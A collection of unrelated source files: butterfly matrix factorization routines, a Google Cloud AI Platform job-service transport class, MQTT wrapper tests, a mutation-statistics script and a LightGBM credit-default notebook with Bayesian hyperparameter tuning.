coly, rowy = np.meshgrid(CP, ce[:len(RP)])
X[rowx, colx] = np.eye(len(RP), len(ce))
Y[rowy, coly] = submatrixA
else:
colx, rowx = np.meshgrid(ce[:len(CP)], RP)
coly, rowy = np.meshgrid(CP, ce)
X[rowx, colx] = submatrixA
Y[rowy, coly] = np.eye(len(ce), len(CP))
for ce in noncec:
rep = ce[0]
RP = np.where(support1[:, rep] == 1)[0]
CP = np.where(support2[rep] == 1)[0]
submatrixA = np.array(A[RP][:, CP])
colx, rowx = np.meshgrid(ce, RP)
coly, rowy = np.meshgrid(CP, ce)
bestx, besty = best_low_rank(submatrixA, len(ce))
X[rowx, colx] = bestx
Y[rowy, coly] = besty
return X, Y
def lifting_two_layers_factorization(support1, support2, A):
"""
Lifting algorithm to factorize A into two factors with supports support1, support2, in the specific case
where support1 and support2 have disjoint rank one supports.
:param support1: numpy array, binary matrix
:param support2: numpy array, binary matrix
:param A: numpy array
:return: X, Y are the left and right factors, as numpy arrays.
"""
assert support1.shape[1] == support2.shape[0]
dtype = np.complex128 if np.iscomplex(A).any() else np.float64
X = np.zeros(support1.shape, dtype=dtype)
Y = np.zeros(support2.shape, dtype=dtype)
r = support1.shape[1]
for t in range(r):
rows = np.where(support1[:, t])[0]
cols = np.where(support2[t, :])[0]
subA = A[np.ix_(rows, cols)]
u, v = best_low_rank(subA, 1)
X[rows, t] = np.squeeze(u)
Y[t, cols] = np.squeeze(v)
return X, Y
def simple_hierarchical_factorization(support, A):
"""
Hierarchical factorization approach in Section 5.2
:param support: list of numpy arrays
:param A: numpy array
:return: list of numpy arrays
"""
result = []
matrix = A
for i in range(len(support) - 1):
support1 = support[i]
support2 = np.identity(support[i].shape[1])
for sp in support[i+1:]:
support2 = support2 @ sp
support2 = np.where(support2 > 0, 1, 0)
X, Y = solve_DTO(support1, support2, matrix)
result.append(X)
matrix = Y
result.append(matrix)
return result
def tree_hierarchical_factorization(root, A, method='lifting'):
"""
Method for hierarchical factorization described by a tree. We suppose that the sparsity constraints are the
butterfly supports.
:param root: Node object
:param A: numpy array
:param method: choice between 'lifting' or 'DTO'. Prefer 'lifting' since it is faster.
:return: list of numpy arrays, representing the sparse factors of A.
"""
assert not root.is_leaf()
if method == 'DTO':
X, Y = solve_DTO(root.left.support, root.right.support, A)
else:
assert method == 'lifting'
X, Y = lifting_two_layers_factorization(root.left.support, root.right.support, A)
left_factors = [X] if root.left.is_leaf() else tree_hierarchical_factorization(root.left, X)
right_factors = [Y] if root.right.is_leaf() else tree_hierarchical_factorization(root.right, Y)
return left_factors + right_factors
def project_BP_model_P_fixed(matrix, tree_type, p=None, max_depth=-1, return_factors=False, return_root=False):
generate_partial_tree, generate_tree = get_generation_tree_methods(tree_type)
num_factors = int(np.log2(matrix.shape[1]))
if max_depth >= 0:
root = generate_partial_tree(0, num_factors, num_factors, 0, max_depth)
else:
root = generate_tree(0, num_factors, num_factors)
if p is not None:
factors = tree_hierarchical_factorization(root, matrix @ np.transpose(p))
product = utils.product_of_factors(factors) @ p
else:
factors = tree_hierarchical_factorization(root, matrix)
product = utils.product_of_factors(factors)
if return_factors:
if return_root:
return product, factors, root
return product, factors
if return_root:
return product, root
return product
def get_generation_tree_methods(tree_type):
if tree_type == "comb":
generate_partial_tree = src.tree.generate_partial_comb_tree
generate_tree = src.tree.generate_comb_tree
elif tree_type == "inversed_comb":
generate_partial_tree = src.tree.generate_partial_inversed_comb_tree
generate_tree = src.tree.generate_inversed_comb_tree
else:
assert tree_type == "balanced"
generate_partial_tree = src.tree.generate_partial_balanced_tree
generate_tree = src.tree.generate_balanced_tree
return generate_partial_tree, generate_tree
def project_BP_model_8_perm_fixed(matrix, tree_type, max_depth=-1, return_factors=False, return_root=False):
num_factors = int(np.log2(matrix.shape[1]))
permutations = [utils.get_permutation_matrix(num_factors, perm_name)
for perm_name in ["000", "001", "010", "011", "100", "101", "110", "111"]]
# print(permutations)
projections = [project_BP_model_P_fixed(matrix, tree_type, p, max_depth, return_factors, return_root) for p in permutations]
if return_factors or return_root:
errors = [np.linalg.norm(matrix - projection[0]) / np.linalg.norm(matrix) for projection in projections]
else:
errors = [np.linalg.norm(matrix - projection) / np.linalg.norm(matrix) for projection in projections]
print(errors)
argmin_error = np.argmin(errors)
return (*projections[argmin_error], permutations[argmin_error])
"""
if __name__ == '__main__':
import scipy
n = 9
matrix = scipy.linalg.hadamard(2 ** n)# @ utils.bit_reversal_permutation_matrix(n).T
support = utils.support_DFT(n)
result = simple_hierarchical_factorization(support, matrix)
print(utils.error_cal(result, matrix))
"""
|
the-stack_106_14833
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.aiplatform_v1beta1.types import batch_prediction_job
from google.cloud.aiplatform_v1beta1.types import (
batch_prediction_job as gca_batch_prediction_job,
)
from google.cloud.aiplatform_v1beta1.types import custom_job
from google.cloud.aiplatform_v1beta1.types import custom_job as gca_custom_job
from google.cloud.aiplatform_v1beta1.types import data_labeling_job
from google.cloud.aiplatform_v1beta1.types import (
data_labeling_job as gca_data_labeling_job,
)
from google.cloud.aiplatform_v1beta1.types import hyperparameter_tuning_job
from google.cloud.aiplatform_v1beta1.types import (
hyperparameter_tuning_job as gca_hyperparameter_tuning_job,
)
from google.cloud.aiplatform_v1beta1.types import job_service
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class JobServiceTransport(abc.ABC):
"""Abstract transport class for JobService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
def __init__(
self,
*,
host: str = "aiplatform.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_custom_job: gapic_v1.method.wrap_method(
self.create_custom_job, default_timeout=None, client_info=client_info,
),
self.get_custom_job: gapic_v1.method.wrap_method(
self.get_custom_job, default_timeout=None, client_info=client_info,
),
self.list_custom_jobs: gapic_v1.method.wrap_method(
self.list_custom_jobs, default_timeout=None, client_info=client_info,
),
self.delete_custom_job: gapic_v1.method.wrap_method(
self.delete_custom_job, default_timeout=None, client_info=client_info,
),
self.cancel_custom_job: gapic_v1.method.wrap_method(
self.cancel_custom_job, default_timeout=None, client_info=client_info,
),
self.create_data_labeling_job: gapic_v1.method.wrap_method(
self.create_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.get_data_labeling_job: gapic_v1.method.wrap_method(
self.get_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.list_data_labeling_jobs: gapic_v1.method.wrap_method(
self.list_data_labeling_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_data_labeling_job: gapic_v1.method.wrap_method(
self.delete_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_data_labeling_job: gapic_v1.method.wrap_method(
self.cancel_data_labeling_job,
default_timeout=None,
client_info=client_info,
),
self.create_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.create_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.get_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.get_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.list_hyperparameter_tuning_jobs: gapic_v1.method.wrap_method(
self.list_hyperparameter_tuning_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.delete_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_hyperparameter_tuning_job: gapic_v1.method.wrap_method(
self.cancel_hyperparameter_tuning_job,
default_timeout=None,
client_info=client_info,
),
self.create_batch_prediction_job: gapic_v1.method.wrap_method(
self.create_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.get_batch_prediction_job: gapic_v1.method.wrap_method(
self.get_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.list_batch_prediction_jobs: gapic_v1.method.wrap_method(
self.list_batch_prediction_jobs,
default_timeout=None,
client_info=client_info,
),
self.delete_batch_prediction_job: gapic_v1.method.wrap_method(
self.delete_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
self.cancel_batch_prediction_job: gapic_v1.method.wrap_method(
self.cancel_batch_prediction_job,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def create_custom_job(
self,
) -> typing.Callable[
[job_service.CreateCustomJobRequest],
typing.Union[
gca_custom_job.CustomJob, typing.Awaitable[gca_custom_job.CustomJob]
],
]:
raise NotImplementedError()
@property
def get_custom_job(
self,
) -> typing.Callable[
[job_service.GetCustomJobRequest],
typing.Union[custom_job.CustomJob, typing.Awaitable[custom_job.CustomJob]],
]:
raise NotImplementedError()
@property
def list_custom_jobs(
self,
) -> typing.Callable[
[job_service.ListCustomJobsRequest],
typing.Union[
job_service.ListCustomJobsResponse,
typing.Awaitable[job_service.ListCustomJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_custom_job(
self,
) -> typing.Callable[
[job_service.DeleteCustomJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_custom_job(
self,
) -> typing.Callable[
[job_service.CancelCustomJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_data_labeling_job(
self,
) -> typing.Callable[
[job_service.CreateDataLabelingJobRequest],
typing.Union[
gca_data_labeling_job.DataLabelingJob,
typing.Awaitable[gca_data_labeling_job.DataLabelingJob],
],
]:
raise NotImplementedError()
@property
def get_data_labeling_job(
self,
) -> typing.Callable[
[job_service.GetDataLabelingJobRequest],
typing.Union[
data_labeling_job.DataLabelingJob,
typing.Awaitable[data_labeling_job.DataLabelingJob],
],
]:
raise NotImplementedError()
@property
def list_data_labeling_jobs(
self,
) -> typing.Callable[
[job_service.ListDataLabelingJobsRequest],
typing.Union[
job_service.ListDataLabelingJobsResponse,
typing.Awaitable[job_service.ListDataLabelingJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_data_labeling_job(
self,
) -> typing.Callable[
[job_service.DeleteDataLabelingJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_data_labeling_job(
self,
) -> typing.Callable[
[job_service.CancelDataLabelingJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.CreateHyperparameterTuningJobRequest],
typing.Union[
gca_hyperparameter_tuning_job.HyperparameterTuningJob,
typing.Awaitable[gca_hyperparameter_tuning_job.HyperparameterTuningJob],
],
]:
raise NotImplementedError()
@property
def get_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.GetHyperparameterTuningJobRequest],
typing.Union[
hyperparameter_tuning_job.HyperparameterTuningJob,
typing.Awaitable[hyperparameter_tuning_job.HyperparameterTuningJob],
],
]:
raise NotImplementedError()
@property
def list_hyperparameter_tuning_jobs(
self,
) -> typing.Callable[
[job_service.ListHyperparameterTuningJobsRequest],
typing.Union[
job_service.ListHyperparameterTuningJobsResponse,
typing.Awaitable[job_service.ListHyperparameterTuningJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.DeleteHyperparameterTuningJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_hyperparameter_tuning_job(
self,
) -> typing.Callable[
[job_service.CancelHyperparameterTuningJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
@property
def create_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.CreateBatchPredictionJobRequest],
typing.Union[
gca_batch_prediction_job.BatchPredictionJob,
typing.Awaitable[gca_batch_prediction_job.BatchPredictionJob],
],
]:
raise NotImplementedError()
@property
def get_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.GetBatchPredictionJobRequest],
typing.Union[
batch_prediction_job.BatchPredictionJob,
typing.Awaitable[batch_prediction_job.BatchPredictionJob],
],
]:
raise NotImplementedError()
@property
def list_batch_prediction_jobs(
self,
) -> typing.Callable[
[job_service.ListBatchPredictionJobsRequest],
typing.Union[
job_service.ListBatchPredictionJobsResponse,
typing.Awaitable[job_service.ListBatchPredictionJobsResponse],
],
]:
raise NotImplementedError()
@property
def delete_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.DeleteBatchPredictionJobRequest],
typing.Union[operations.Operation, typing.Awaitable[operations.Operation]],
]:
raise NotImplementedError()
@property
def cancel_batch_prediction_job(
self,
) -> typing.Callable[
[job_service.CancelBatchPredictionJobRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
__all__ = ("JobServiceTransport",)
|
the-stack_106_14835
|
"""Test the MQTT Wrapper class."""
import asyncio
from typing import Match
import gmqtt
import pytest
from pydantic import BaseModel
from automation_engine.config import MQTTBrokerInfo
from automation_engine.mqtt.topic import Topic
from automation_engine.mqtt.wrapper import MQTTWrapper
BROKER_INFO = MQTTBrokerInfo(
host="localhost",
port=1883,
)
class StubModel(BaseModel):
"""Test BaseModel."""
foo: str
async def stub_message_handler(
match: Match[str],
payload: str,
) -> None:
"""Used in tests as a stub with the right type."""
pass
def test_wrapper_init_minimal() -> None:
"""Test initialising the wrapper with minimal options."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr._client_name == "foo"
assert wr._last_will is None
assert len(wr._topic_handlers) == 0
assert wr._client._client_id == "foo"
def test_wrapper_is_connected_at_init() -> None:
"""Test that the wrapper is not connected to the broker at init."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert not wr.is_connected
def test_wrapper_last_will_message_null() -> None:
"""Test that the last will message is None when not supplied."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr.last_will_message is None
def test_wrapper_mqtt_prefix() -> None:
"""Test that the MQTT prefix is as expected."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert wr.mqtt_prefix == "automation-engine"
def test_subscribe() -> None:
"""Test that subscribing works as expected."""
wr = MQTTWrapper("foo", BROKER_INFO)
assert len(wr._topic_handlers) == 0
wr.subscribe("bees/+", stub_message_handler)
assert len(wr._topic_handlers) == 1
assert wr._topic_handlers[
Topic(["automation-engine", "bees", "+"])
] == stub_message_handler
@pytest.mark.filterwarnings("ignore")
@pytest.mark.asyncio
async def test_connect_disconnect() -> None:
"""Test that the wrapper can connect and disconnect from the broker."""
wr = MQTTWrapper("foo", BROKER_INFO)
await wr.connect()
assert wr.is_connected
await wr.disconnect()
assert not wr.is_connected
@pytest.mark.asyncio
async def test_handler_called() -> None:
"""Test that subscription handlers are called correctly."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
assert payload == "hive"
ev.set()
wr = MQTTWrapper("foo", BROKER_INFO)
wr.subscribe("bees/+", test_handler)
await wr.connect()
# Manually call on_message
res = await wr.on_message(
wr._client,
"automation-engine/bees/bar",
b"hive",
0,
{},
)
assert res == gmqtt.constants.PubRecReasonCode.SUCCESS
await asyncio.wait_for(ev.wait(), 0.1)
await wr.disconnect()
@pytest.mark.asyncio
async def test_publish_send_and_receive() -> None:
"""Test that we can publish and receive a message."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
ev.set()
wr_sub = MQTTWrapper("foo", BROKER_INFO)
wr_pub = MQTTWrapper("bar", BROKER_INFO)
wr_sub.subscribe("bees/+", test_handler)
await wr_sub.connect()
await wr_pub.connect()
wr_pub.publish("bees/foo", StubModel(foo="bar"))
await asyncio.wait_for(ev.wait(), 0.5)
await wr_sub.disconnect()
await wr_pub.disconnect()
@pytest.mark.asyncio
async def test_publish_send_and_receive_on_self() -> None:
"""Test that we can publish and receive a message on it's own topic."""
ev = asyncio.Event()
async def test_handler(
match: Match[str],
payload: str,
) -> None:
ev.set()
wr_sub = MQTTWrapper("foo", BROKER_INFO)
wr_pub = MQTTWrapper("bar", BROKER_INFO)
wr_sub.subscribe("", test_handler)
await wr_sub.connect()
await wr_pub.connect()
wr_pub.publish("", StubModel(foo="bar"))
await asyncio.wait_for(ev.wait(), 0.5)
await wr_sub.disconnect()
await wr_pub.disconnect()
@pytest.mark.asyncio
async def test_publish_bad_topic_error() -> None:
"""Test that we cannot publish to an invalid topic."""
wr_pub = MQTTWrapper("bar", BROKER_INFO)
await wr_pub.connect()
with pytest.raises(ValueError):
wr_pub.publish("bees/+", StubModel(foo="bar"))
with pytest.raises(ValueError):
wr_pub.publish("bees/#", StubModel(foo="bar"))
with pytest.raises(ValueError):
wr_pub.publish("bees/", StubModel(foo="bar"))
await wr_pub.disconnect()
|
the-stack_106_14837
|
import argparse
import numpy as np
import pickle
import mutstat
def main():
parser = argparse.ArgumentParser(
description='LOL HI THERE',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('sim_data_fn')
parser.add_argument('baseline_mutdist_fn')
args = parser.parse_args()
with open(args.sim_data_fn, 'rb') as dataf:
simdata = pickle.load(dataf)
clusters = [[]] + simdata['clusters']
vids, membership = util.make_membership_mat(clusters)
mphi = np.dot(membership, simdata['phi'])
baseline = mutstat.Mutstat(stats=mphi, vids=vids, assays=simdata['sampnames'])
mutstat.write(baseline, args.baseline_mutdist_fn)
if __name__ == '__main__':
main()
|
the-stack_106_14841
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import pandas as pd
import numpy as np
# In[229]:
df = pd.read_csv('D:/Titip/german_credit.csv')
# In[230]:
df['account_check_status'] = df['account_check_status'].str.strip().map({'no checking account' : 'no',
'< 0 DM' : 'negative',
'0 <= ... < 200 DM' : 'low',
'>= 200 DM / salary assignments for at least 1 year' : 'high'})
df['credit_history'] = df['credit_history'].str.strip().map({'existing credits paid back duly till now' : 'A',
'critical account/ other credits existing (not at this bank)' : 'B',
'delay in paying off in the past' : 'C',
'all credits at this bank paid back duly' : 'D',
'no credits taken/ all credits paid back duly' : 'E'})
df['purpose'] = df['purpose'].str.strip().map({'domestic appliances' : 'domestic',
'car (new)' : 'new_car',
'radio/television' : 'radtel',
'car (used)' : 'used_car',
'(vacation - does not exist?)' : 'vacation',
'furniture/equipment' : 'furniture',
'business' : 'business',
'education' : 'education',
'repairs' : 'repairs',
'retraining' : 'retraining'})
df['savings'] = df['savings'].str.strip().map({'... < 100 DM' : 'low',
'unknown/ no savings account' : 'no',
'100 <= ... < 500 DM' : 'medium',
'500 <= ... < 1000 DM' : 'high',
'.. >= 1000 DM' : 'very_high'})
df['present_emp_since'] = df['present_emp_since'].str.strip().map({'... < 1 year' : 'very short',
'1 <= ... < 4 years' : 'short',
'4 <= ... < 7 years' : 'long',
'.. >= 7 years' : 'very_long',
'unemployed' : 'unemployed'})
df['personal_status_sex'] = df['personal_status_sex'].str.strip().map({'male : single' : 'single_male',
'female : divorced/separated/married' : 'female',
'male : married/widowed' : 'mw_male',
'male : divorced/separated' : 'ds_male'})
df['other_debtors'] = df['other_debtors'].str.strip().map({'co-applicant' : 'co_applicant',
'none' : 'none',
'guarantor' : 'guarantor'})
df['property'] = df['property'].str.strip().map({'if not A121/A122 : car or other, not in attribute 6' : 'car',
'real estate' : 'real_estate',
'if not A121 : building society savings agreement/ life insurance' : 'building',
'unknown / no property' : 'unknown'})
df['other_installment_plans'] = df['other_installment_plans'].str.strip()
df['housing'] = df['housing'].str.strip().map({'for free' : 'free',
'own' : 'own',
'rent' : 'rent'})
df['job'] = df['housing'].str.strip().map({'skilled employee / official' : 'skilled',
'unskilled - resident' : 'unskilled_res',
'management/ self-employed/ highly qualified employee/ officer' : 'manager',
'unemployed/ unskilled - non-resident' : 'unskilled_nores'})
df['telephone'] = df['telephone'].str.strip().map({'yes, registered under the customers name' : 'registered',
'none' : 'none'})
del df['job']
# In[231]:
from sklearn.model_selection import train_test_split
X = df.copy()
del X['default']
y = df['default']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 42)
X_train = pd.get_dummies(X_train)
X_test = pd.get_dummies(X_test)
# In[232]:
for i in X_train.columns :
X_train[i] = X_train[i].astype(int)
# In[233]:
for i in X_test.columns :
X_test[i] = X_test[i].astype(int)
# In[234]:
import lightgbm
train_data = lightgbm.Dataset(X_train, label = y_train)
test_data = lightgbm.Dataset(X_test, label = y_test)
parameters_lgb = {
'application': 'binary',
'objective': 'binary',
'metric': 'auc',
'is_unbalance': 'true',
'boosting': 'gbdt',
'num_leaves': 31,
'feature_fraction': 0.5,
'bagging_fraction': 0.5,
'bagging_freq': 20,
'learning_rate': 0.05,
'verbose': 0
}
model = lightgbm.train(params=parameters_lgb,
train_set= train_data,
valid_sets=test_data,
num_boost_round=5000,
early_stopping_rounds=100)
# In[192]:
df2 = df.copy()
# In[193]:
df2 = pd.get_dummies(df2)
# In[194]:
from bayes_opt import BayesianOptimization
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score, roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
import lightgbm as lgb
# In[195]:
bayesian_tr_idx = X_train.index
bayesian_val_idx = X_test.index
# In[197]:
bounds_LGB = {
'num_leaves': (31, 500),
'min_data_in_leaf': (20, 200),
'bagging_fraction' : (0.1, 0.9),
'feature_fraction' : (0.1, 0.9),
'learning_rate': (0.01, 0.3),
'min_child_weight': (0.00001, 0.01),
'reg_alpha': (1, 2),
'reg_lambda': (1, 2),
'max_depth':(-1,50),
}
# In[198]:
def LGB_bayesian(
learning_rate,
num_leaves,
bagging_fraction,
feature_fraction,
min_child_weight,
min_data_in_leaf,
max_depth,
reg_alpha,
reg_lambda
):
# LightGBM expects next three parameters need to be integer.
num_leaves = int(num_leaves)
min_data_in_leaf = int(min_data_in_leaf)
max_depth = int(max_depth)
assert type(num_leaves) == int
assert type(min_data_in_leaf) == int
assert type(max_depth) == int
param = {
'num_leaves': num_leaves,
'min_data_in_leaf': min_data_in_leaf,
'min_child_weight': min_child_weight,
'bagging_fraction' : bagging_fraction,
'feature_fraction' : feature_fraction,
'learning_rate' : learning_rate,
'max_depth': max_depth,
'reg_alpha': reg_alpha,
'reg_lambda': reg_lambda,
'objective': 'binary',
'save_binary': True,
'seed': 1337,
'feature_fraction_seed': 1337,
'bagging_seed': 1337,
'drop_seed': 1337,
'data_random_seed': 1337,
'boosting_type': 'gbdt',
'verbose': 1,
'is_unbalance': False,
'boost_from_average': True,
'metric':'auc'}
oof = np.zeros(len(df2))
trn_data= lgb.Dataset(df2.iloc[bayesian_tr_idx][features].values, label=df2.iloc[bayesian_tr_idx][target].values)
val_data= lgb.Dataset(df2.iloc[bayesian_val_idx][features].values, label=df2.iloc[bayesian_val_idx][target].values)
clf = lgb.train(param, trn_data, num_boost_round=50, valid_sets = [trn_data, val_data], verbose_eval=0, early_stopping_rounds = 50)
oof[bayesian_val_idx] = clf.predict(df2.iloc[bayesian_val_idx][features].values, num_iteration=clf.best_iteration)
score = roc_auc_score(df2.iloc[bayesian_val_idx][target].values, oof[bayesian_val_idx])
return score
# In[199]:
LGB_BO = BayesianOptimization(LGB_bayesian, bounds_LGB, random_state=0)
# In[200]:
init_points = 10
n_iter = 15
# In[202]:
import warnings
warnings.filterwarnings("ignore")
features = list(df2)
features.remove('default')
target = 'default'
print('-' * 130)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
LGB_BO.maximize(init_points=init_points, n_iter=n_iter, acq='ucb', xi=0.0, alpha=1e-6)
# In[203]:
param_lgb = {
'min_data_in_leaf': int(LGB_BO.max['params']['min_data_in_leaf']),
'num_leaves': int(LGB_BO.max['params']['num_leaves']),
'learning_rate': LGB_BO.max['params']['learning_rate'],
'min_child_weight': LGB_BO.max['params']['min_child_weight'],
'bagging_fraction': LGB_BO.max['params']['bagging_fraction'],
'feature_fraction': LGB_BO.max['params']['feature_fraction'],
'reg_lambda': LGB_BO.max['params']['reg_lambda'],
'reg_alpha': LGB_BO.max['params']['reg_alpha'],
'max_depth': int(LGB_BO.max['params']['max_depth']),
'objective': 'binary',
'save_binary': True,
'seed': 1337,
'feature_fraction_seed': 1337,
'bagging_seed': 1337,
'drop_seed': 1337,
'data_random_seed': 1337,
'boosting_type': 'gbdt',
'verbose': 1,
'is_unbalance': False,
'boost_from_average': True,
'metric':'auc'
}
# In[205]:
import matplotlib.pyplot as plt
def plot_confusion_matrix(cm, classes,
normalize = False,
title = 'Confusion matrix"',
cmap = plt.cm.Blues) :
plt.imshow(cm, interpolation = 'nearest', cmap = cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation = 0)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])) :
plt.text(j, i, cm[i, j],
horizontalalignment = 'center',
color = 'white' if cm[i, j] > thresh else 'black')
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# In[208]:
from sklearn.model_selection import StratifiedKFold,KFold
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score, roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
from scipy import interp
import itertools
plt.rcParams["axes.grid"] = True
nfold = 5
skf = StratifiedKFold(n_splits=nfold, shuffle=True, random_state=42)
oof = np.zeros(len(df2))
mean_fpr = np.linspace(0,1,100)
cms= []
tprs = []
aucs = []
y_real = []
y_proba = []
recalls = []
roc_aucs = []
f1_scores = []
accuracies = []
precisions = []
predictions = np.zeros(len(X_test))
feature_importance_df2 = pd.DataFrame()
i = 1
for train_idx, valid_idx in skf.split(df2, df2['default'].values):
print("\nfold {}".format(i))
trn_data = lgb.Dataset(df2.iloc[train_idx][features].values,
label=df2.iloc[train_idx][target].values
)
val_data = lgb.Dataset(df2.iloc[valid_idx][features].values,
label=df2.iloc[valid_idx][target].values
)
clf = lgb.train(param_lgb, trn_data, num_boost_round = 500, valid_sets = [trn_data, val_data], verbose_eval = 100, early_stopping_rounds = 100)
oof[valid_idx] = clf.predict(df2.iloc[valid_idx][features].values)
predictions += clf.predict(X_test[features]) / nfold
# Scores
roc_aucs.append(roc_auc_score(df2.iloc[valid_idx][target].values, oof[valid_idx]))
accuracies.append(accuracy_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
recalls.append(recall_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
precisions.append(precision_score(df2.iloc[valid_idx][target].values ,oof[valid_idx].round()))
f1_scores.append(f1_score(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
# Roc curve by folds
f = plt.figure(1)
fpr, tpr, t = roc_curve(df2.iloc[valid_idx][target].values, oof[valid_idx])
tprs.append(interp(mean_fpr, fpr, tpr))
roc_auc = auc(fpr, tpr)
aucs.append(roc_auc)
plt.plot(fpr, tpr, lw=2, alpha=0.3, label='ROC fold %d (AUC = %0.4f)' % (i,roc_auc))
# Precion recall by folds
g = plt.figure(2)
precision, recall, _ = precision_recall_curve(df2.iloc[valid_idx][target].values, oof[valid_idx])
y_real.append(df2.iloc[valid_idx][target].values)
y_proba.append(oof[valid_idx])
plt.plot(recall, precision, lw=2, alpha=0.3, label='P|R fold %d' % (i))
i= i+1
# Confusion matrix by folds
